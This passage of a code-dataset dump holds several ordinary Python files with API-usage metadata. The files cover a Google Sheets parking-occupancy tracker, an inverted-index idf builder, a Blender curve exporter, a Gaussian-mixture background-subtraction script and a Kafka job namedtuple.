"call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 209, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 210, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 229, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 233, "usage_type": "name"}, {"api_name": 
"numpy.sqrt", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 272, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 274, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 275, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 276, "usage_type": "argument"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 391, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 391, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 392, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 393, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 393, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 394, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 398, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 398, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 399, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 399, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 400, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 400, "usage_type": "name"}, {"api_name": 
"numpy.sqrt", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 431, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 431, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 451, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}]}
+{"seq_id": "471967973", "text": "import gspread\nimport time\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import *\n\nscope = []\ncreds = []\n\nsheet = None\nlogSheet = None\nclient = None\n\nDATE_FORMAT_STRING = \"%Y-%m-%d %H:%M:%S EST\"\n\n# Getters\n\ndef isThereParking():\n    return (spacesAvailable() > 0)\n\ndef occupiedStatusList():\n    # Returns a list of occupation statuses, one per parking spot\n\n    connectSheet() # Refresh the sheet values\n    statusList = sheet.col_values(2)[1:] # Values arrive as strings like TRUE/FALSE; isOccupied() parses them\n\n    return statusList\n\ndef spacesAvailable():\n    occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n\n    parkingSpaceCount = 0\n\n    for i in range(0, len(occupiedStatuses)):\n        if not isOccupied(i): # count the spots that are NOT occupied (the original counted occupied ones)\n            parkingSpaceCount = parkingSpaceCount + 1\n\n    return parkingSpaceCount\n\ndef isOccupied(zeroIndexedSpaceNumber):\n    occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n    return occupiedStatuses[zeroIndexedSpaceNumber].lower() == \"true\" # Get from list, cast to bool\n\ndef getParkingSpaceCount():\n    occupiedStatuses = occupiedStatusList() # get list of statuses from Google Sheets spreadsheet\n    return len(occupiedStatuses) # Return the number of entries in the list.\n\n# Setters\n\ndef setOccupied(zeroIndexedSpaceNumber):\n    connectSheet() # Refresh state\n    index = 2 + zeroIndexedSpaceNumber\n\n    if not isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n        logOccupation()\n\n    sheet.update_cell(index, 2, True) # Set the specified space to be occupied\n\ndef setVacant(zeroIndexedSpaceNumber):\n    connectSheet() # Refresh state\n    index = 2 + zeroIndexedSpaceNumber\n\n    if isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n        logVacancy()\n\n    sheet.update_cell(index, 2, False) # Set the specified space to be unoccupied\n\ndef setParkingSpaceCount(oneIndexedSpaceNumber):\n    if (oneIndexedSpaceNumber < 1):\n        return\n\n    initialIndex = getParkingSpaceCount() # Get number of parking spaces in lot.\n\n    # If the index is greater than the list length, then allocate more rows\n    # to the table and ID accordingly.\n    if oneIndexedSpaceNumber > initialIndex:\n        for i in range( (initialIndex + 2),(oneIndexedSpaceNumber + 2) ):\n            sheet.update_cell(i, 1, i-2)\n            sheet.update_cell(i, 2, False)\n    # Otherwise, if lesser, eliminate all items indexed at/after oneIndexedSpaceNumber.\n    elif oneIndexedSpaceNumber < initialIndex:\n        for i in range( (oneIndexedSpaceNumber + 2),(initialIndex + 2)):\n            sheet.update_cell(i, 1, \"\")\n            sheet.update_cell(i, 2, \"\")\n\n    # If the length is the same as it already is, make no changes.\n\n\n\n#\n# All backend stuff to do with google sheets stuff\n#\n\ndef connectSheet():\n    if isUninitialized():\n        makeConnection()\n\ndef isUninitialized():\n    return (sheet is None)\n\ndef makeConnection():\n    # Make the connection to the Google Spreadsheet\n    scope = ['https://spreadsheets.google.com/feeds',\n             'https://www.googleapis.com/auth/drive']\n    creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\n    global client\n    client = gspread.authorize(creds)\n    global sheet\n    global logSheet\n    sheet = client.open('parking-status').get_worksheet(0)\n    logSheet = client.open(\"parking-status\").get_worksheet(1)\n\n#\n# DateTime stuff\n#\n\ndef dateTimeFormat(dateTimeValue):\n    return 
dateTimeValue.strftime(DATE_FORMAT_STRING)\n\ndef logVacancy(dateTimeValue=None):\n    dateTimeValue = dateTimeValue or datetime.now() # default computed at call time; datetime.now() as a default value would be frozen at import\n    timeListIndex = len(logSheet.col_values(1)) + 1 # Get row to insert time in\n    logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Insert time into list.\n    newLogValue = int(logSheet.cell(timeListIndex - 1, 2).value) - 1 # Get new count of people in lot\n    logSheet.update_cell(timeListIndex, 2, newLogValue) # Set new count of people in lot to sheet\n\ndef logOccupation(dateTimeValue=None):\n    dateTimeValue = dateTimeValue or datetime.now() # default computed at call time, as above\n    columnLength = len(logSheet.col_values(1)[1:]) # Read length of date column\n    timeListIndex = columnLength + 2 # Get new index of insertion into log\n    newOccupancyCount = 0\n\n    if columnLength > 0: # If a previous value exists, our new occupancy is based on the previous value.\n        newOccupancyCount = int(logSheet.cell(timeListIndex - 1, 2).value) + 1\n    else: # Otherwise, our new occupancy is 1 because we assume that our initial occupancy is 0.\n        newOccupancyCount = 1\n\n    logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Set new date in column 1\n    logSheet.update_cell(timeListIndex, 2, newOccupancyCount) # Set new occupancy count in column 2\n\n\n# ALL CODE THAT IS RUN FOR CERTAIN IS RUN HERE\n", "sub_path": "util/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 4925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 107, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 107, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 129, "usage_type": "call"}]}
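The dateTimeValue=None pattern used above matters because Python evaluates default arguments once, at function-definition time. A small demonstration of the pitfall the original dateTimeValue=datetime.now() signature hits:

import time
from datetime import datetime

def bad(ts=datetime.now()):    # evaluated ONCE, when the module is imported
    return ts

def good(ts=None):
    return ts if ts is not None else datetime.now()   # evaluated per call

first = bad(); time.sleep(1); second = bad()
assert first == second         # timestamp frozen at definition time

first = good(); time.sleep(1); second = good()
assert first != second         # fresh timestamp on every call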
+{"seq_id": "381163747", "text": "import numpy as np\nimport multiprocessing\nimport pickle\nimport pandas as pd\nfrom utils import load_pkl\nfrom cli import get_args\nfrom pathlib import Path\nimport os\nDATA_LEN = 46972\n\n\ndef get_inverted_data(model_dir):\n with open(model_dir / \"inverted-file\", \"r\") as f:\n unigram_idf = {}\n bigram_idf = {}\n doc_datas = [{'doc_len': 0, 'unigram': {}, 'bigram': {}} for _ in range(DATA_LEN)]\n while True:\n head_line = f.readline().strip()\n if head_line == \"\":\n break\n head_line = list(map(int, head_line.split()))\n head_idx = head_line[0]\n print(head_idx, end='\\r')\n if head_line[1] == -1:\n unigram_idf[str(head_idx)] = np.log(DATA_LEN / head_line[2])\n else:\n bigram_idf[str(head_idx) + \" \" + str(head_line[1])] = np.log(DATA_LEN / head_line[2])\n for _ in range(head_line[2]):\n line = f.readline()\n line = list(map(int, line.strip().split()))\n if head_line[1] == -1:\n doc_datas[line[0]]['doc_len'] += line[1]\n doc_datas[line[0]]['unigram'][str(head_idx)] = line[1]\n else:\n doc_datas[line[0]]['bigram'][str(head_line[0]) + \" \" + str(head_line[1])] = line[1]\n return unigram_idf, bigram_idf, doc_datas\n\n\nif __name__ == \"__main__\":\n args = get_args()\n if os.path.exists(\"unigram_idf.pkl\") and os.path.exists(\"bigram_idf.pkl\") and os.path.exists(\"doc_datas.pkl\"):\n pass\n else:\n unigram_idf, bigram_idf, doc_datas = get_inverted_data(args.model_dir)\n with open(\"unigram_idf.pkl\", \"wb\") as f:\n pickle.dump(unigram_idf, f)\n\n with open(\"bigram_idf.pkl\", \"wb\") as f:\n pickle.dump(bigram_idf, f)\n\n with open(\"doc_datas.pkl\", \"wb\") as f:\n pickle.dump(doc_datas, f)\n", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 27, "usage_type": "call"}, {"api_name": "cli.get_args", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 52, "usage_type": "call"}]}
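get_inverted_data in the record above turns document frequencies from the inverted file into idf weights with idf = ln(N / df). A tiny worked example of that formula, independent of the inverted-file format:

import numpy as np

N = 46972                  # corpus size, as in DATA_LEN above
for df in (1, 100, N):     # document frequency of a term
    print(df, np.log(N / df))
# df = 1  -> ~10.76  (a rare term gets a high weight)
# df = N  -> 0.0     (a term present in every document carries no information)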
+{"seq_id": "387631513", "text": "import bpy\nimport os\n\n\ncurrPath = os.path.splitext(bpy.data.filepath)[0]+ \".curves.js\"\nfile = open(currPath, \"w\") \n\nfile.write('var curves = {\\n')\nfor ob in bpy.data.objects.values() : \n if ob.type == 'CURVE' :\n file.write( '\"%s\":\\n' % ob.name)\n for spline in ob.data.splines :\n if len(spline.bezier_points) > 0 :\n file.write(\"[\")\n for bezier_point in spline.bezier_points.values() : \n handle_left = ob.matrix_world * bezier_point.handle_left\n co = ob.matrix_world * bezier_point.co\n handle_right = ob.matrix_world * bezier_point.handle_right\n\n file.write(\"[[%.3f, %.3f, %.3f], \" % (handle_left.x, handle_left.y, handle_left.z ))\n file.write(\"[%.3f, %.3f, %.3f], \" % (co.x, co.y, co.z ))\n file.write(\"[%.3f, %.3f, %.3f]],\\n \" % (handle_right.x, handle_right.y, handle_right.z ))\n\n file.write(\"],\\n\")\nfile.write(\"}\\n\")\nfile.close()", "sub_path": "tools/curve_exports.py", "file_name": "curve_exports.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.splitext", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.values", "line_number": 9, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 9, "usage_type": "attribute"}]}
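Each exported control point above is a [handle_left, co, handle_right] triple; in Blender, consecutive anchors define a cubic Bezier segment whose four control points are co_i, handle_right_i, handle_left_{i+1}, co_{i+1}. A sketch of evaluating such a segment in Bernstein form (plain Python; the sample anchors are made up):

def cubic_bezier(p0, p1, p2, p3, t):
    # Evaluate one cubic Bezier segment at parameter t in [0, 1].
    u = 1.0 - t
    return tuple(
        u**3 * a + 3 * u**2 * t * b + 3 * u * t**2 * c + t**3 * d
        for a, b, c, d in zip(p0, p1, p2, p3)
    )

# two anchors in the exported layout: [handle_left, co, handle_right]
a0 = [(-1, 0, 0), (0, 0, 0), (1, 0, 0)]
a1 = [(2, 1, 0), (3, 2, 0), (4, 3, 0)]
seg = (a0[1], a0[2], a1[0], a1[1])   # co_i, right_i, left_{i+1}, co_{i+1}
print([cubic_bezier(*seg, t / 4) for t in range(5)])   # t=0 gives a0's co, t=1 gives a1's co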
+{"seq_id": "387631513", "text": "import numpy as np\nimport cv2 as cv2\nimport glob\nimport time\nimport os\nimport shutil\n\nglobal m_fit_num\n\nclass GMM():\n\n    def __init__(self):\n        self.GMM_MAX_COMPONT = 5 # number of Gaussians in the mixture\n        self.SIGMA = 30\n        self.WEIGHT = 0.05\n        self.T = 0.7 # background threshold on the sorted cumulative weights\n        self.alpha = 0.005 # learning rate\n        self.eps = pow(10, -10)\n        self.channel = 3 # the three RGB channels\n        self.m_weight = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # weights\n        self.m_mean = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # means\n        self.m_sigma = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # sigma (used as the standard deviation)\n\n    def init_model(self,img):\n        row , col , channel = img.shape # get the image height, width and channel count\n        global m_fit_num\n        for i in range(self.GMM_MAX_COMPONT * self.channel):\n            self.m_weight[i] = np.zeros((row,col),dtype=\"float32\") # five Gaussians per pixel, for each of the three channels\n            self.m_mean[i] = np.zeros((row, col), dtype='float32')\n            self.m_sigma[i] = np.ones((row, col), dtype='float32')\n            self.m_sigma[i] *= self.SIGMA\n        m_fit_num = np.zeros((row,col),dtype=\"int32\")\n\n    def train_model(self,images):\n        row, col, channel = images.shape # get the image height, width and channel count\n        B,G,R = cv2.split(images) # cv2.split returns channels in B, G, R order (the original unpacked them as B, R, G, mismatching judge_img)\n        m_mask = np.zeros((row,col),dtype=np.uint8)\n        m_mask[:] = 255\n        for i in range(row): # loop over every pixel\n            for j in range(col):\n                cnt = 0\n                for c,img in enumerate((B,G,R)):\n                    num_fit = 0\n                    for k in range(c * self.GMM_MAX_COMPONT,c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                        if self.m_weight[k][i][j] != 0: # this Gaussian is in use (non-zero weight)\n                            delta = abs(img[i][j] - self.m_mean[k][i][j])\n                            if float(delta) < 2.5 * self.m_sigma[k][i][j]: # within 2.5 sigma: update weight, mean and sigma\n                                self.m_weight[k][i][j] = (1 - self.alpha) * self.m_weight[k][i][j] + self.alpha * 1\n                                self.m_mean[k][i][j] = (1 - self.alpha) * self.m_mean[k][i][j] + self.alpha * img[i][j]\n                                self.m_sigma[k][i][j] = np.sqrt((1 - self.alpha) * self.m_sigma[k][i][j] * self.m_sigma[k][i][j] + self.alpha * (img[i][j] - self.m_mean[k][i][j]) * (img[i][j] - self.m_mean[k][i][j]))\n                                num_fit += 1\n                            else:\n                                self.m_weight[k][i][j] *= (1 - self.alpha)\n\n                    for p in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT): # sort the Gaussians by descending weight/sigma for later selection\n                        for q in range(p + 1, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                            if (self.m_weight[p][i][j] / self.m_sigma[p][i][j]) <= (self.m_weight[q][i][j] / self.m_sigma[q][i][j]):\n                                self.m_sigma[p][i][j], self.m_sigma[q][i][j] = self.m_sigma[q][i][j], self.m_sigma[p][i][j]\n                                self.m_weight[p][i][j], self.m_weight[q][i][j] = self.m_weight[q][i][j], self.m_weight[p][i][j]\n                                self.m_mean[p][i][j], self.m_mean[q][i][j] = self.m_mean[q][i][j], self.m_mean[p][i][j]\n                    if num_fit == 0: # no Gaussian matched this pixel\n                        if self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT-1][i][j] ==0 :\n                            for kk in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                                if (0 == self.m_weight[kk][i][j]): # re-initialise a free slot\n                                    self.m_weight[kk][i][j] = self.WEIGHT\n                                    self.m_mean[kk][i][j] = img[i][j]\n                                    self.m_sigma[kk][i][j] = self.SIGMA\n                                    break\n                        else:\n                            self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.WEIGHT\n                            self.m_mean[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = img[i][j]\n                            self.m_sigma[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.SIGMA\n\n                    weight_sum = 0 # normalise the weights of this pixel's Gaussians\n                    for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                        if self.m_weight[nn][i][j] != 0:\n                            weight_sum += self.m_weight[nn][i][j]\n                        else:\n                            break\n                    weight_scale = 1.0 / (weight_sum + self.eps)\n                    weight_sum = 0\n\n                    for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                        if self.m_weight[nn][i][j] != 0:\n                            self.m_weight[nn][i][j] *= weight_scale\n                            weight_sum += self.m_weight[nn][i][j]\n                            if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n                                cnt += 1\n                                break\n                            if weight_sum > self.T:\n                                if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n                                    cnt += 1\n                                break\n                        else:\n                            break\n                if cnt == channel:\n                    m_mask[i][j] = 0\n\n        m_mask = cv2.medianBlur(m_mask, 7)\n\n        kernel_d = np.ones((5, 5), np.uint8)\n        m_mask = cv2.dilate(m_mask, kernel_d)\n        # element = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3)) # library call for morphological denoising\n        # m_mask = cv2.morphologyEx(m_mask, cv2.MORPH_OPEN, element) # opening operation to remove noise\n        return m_mask\n\n    def judge_img(self,imgs):\n        row, col, channel = imgs.shape\n        B, G, R = cv2.split(imgs)\n        m_mask = np.zeros((row, col), dtype=np.uint8)\n        m_mask[:] = 255\n        for i in range(row):\n            for j in range(col):\n                cnt = 0\n                for c, img in enumerate((B, G, R)): # decide for every pixel whether it is foreground or background\n                    weight_sum = 0\n                    for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n                        if self.m_weight[nn][i][j] != 0:\n                            weight_sum += self.m_weight[nn][i][j]\n                            if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n                                cnt += 1\n                                break\n                            if weight_sum > self.T:\n                                if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n                                    cnt += 1\n                                break\n                        else:\n                            break\n\n                if cnt == channel:\n                    m_mask[i][j] = 0\n\n        m_mask = cv2.medianBlur(m_mask, 7)\n        kernel_d = np.ones((5, 5), np.uint8)\n        m_mask = cv2.dilate(m_mask, kernel_d)\n        return m_mask\n\n\n\n\nif __name__ == '__main__':\n    file_list = glob.glob('WavingTrees/b*.bmp') # read the list of test files\n    GMM_Model = GMM()\n    GMM_Model.__init__() # __init__ already ran via GMM(); this explicit call is redundant but harmless\n    path = \"GMM_OUTPUT_Primordial\"\n    if os.path.exists(path):\n        shutil.rmtree(path)\n        os.mkdir(path)\n    else:\n        os.mkdir(path)\n    i = -1\n    for file in file_list:\n        i += 1\n        img = cv2.imread(file)\n        if i == 0:\n            GMM_Model.init_model(img) # first frame\n        if i <= 200: # use the first 200 frames to train the model\n            t1 = time.time()\n            print(\"Training pass {}\".format(i))\n            m_mask = GMM_Model.train_model(img)\n            t2 = time.time()\n            print(\"Elapsed time:\",t2 - t1)\n        if i == 286: # training done, start detection\n            print(\"Starting background detection\")\n            t1 = time.time()\n            j = 0\n            for temp_file in file_list:\n                temp_img = cv2.imread(temp_file)\n                m_mask = GMM_Model.judge_img(temp_img)\n                cv2.imwrite(\"GMM_OUTPUT_Primordial/{}.jpg\".format(str(j).zfill(3)), m_mask)\n                j += 1\n            t2 = time.time()\n            print(\"Detection elapsed time:\",t2 - t1)\n\n\n", "sub_path": "GMM_Backgroundsubtraction.py", "file_name": "GMM_Backgroundsubtraction.py", "file_ext": "py", "file_size_in_byte": 8867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 101, "usage_type": 
"attribute"}, {"api_name": "cv2.dilate", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 135, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 147, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "289382679", "text": "__all__ = ['Job']\n\nfrom collections import namedtuple\n\n# Namedtuple which encapsulates a KQ job.\nJob = namedtuple(\n typename='Job',\n field_names=(\n 'id', # Job ID (str)\n 'timestamp', # Unix timestamp indicating when job was enqueued (int)\n 'topic', # Name of the Kafka topic (str)\n 'func', # Function to execute (callable)\n 'args', # Positional arguments (list)\n 'kwargs', # Keyword arguments (dict)\n 'timeout', # Job timeout threshold in seconds (int | float)\n 'key', # Kafka message key if any (str | None)\n 'partition' # Kafka topic partition if any (str | None)\n )\n)\n\n# noinspection PyUnresolvedReferences,PyProtectedMember\nJob.__new__.__defaults__ = (None,) * len(Job._fields)\n", "sub_path": "kq/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 6, "usage_type": "call"}]}
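The Job.__new__.__defaults__ assignment in the record above backfills a default of None for every namedtuple field, which is what lets callers build partial jobs. A quick check of the behaviour, plus the Python 3.7+ spelling of the same idea:

from collections import namedtuple

Pair = namedtuple('Pair', ('a', 'b'))
Pair.__new__.__defaults__ = (None,) * len(Pair._fields)

print(Pair())        # Pair(a=None, b=None)
print(Pair(a=1))     # Pair(a=1, b=None)

# On Python 3.7+ the same effect is available directly:
Pair37 = namedtuple('Pair37', ('a', 'b'), defaults=(None, None))
print(Pair37())      # Pair37(a=None, b=None)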
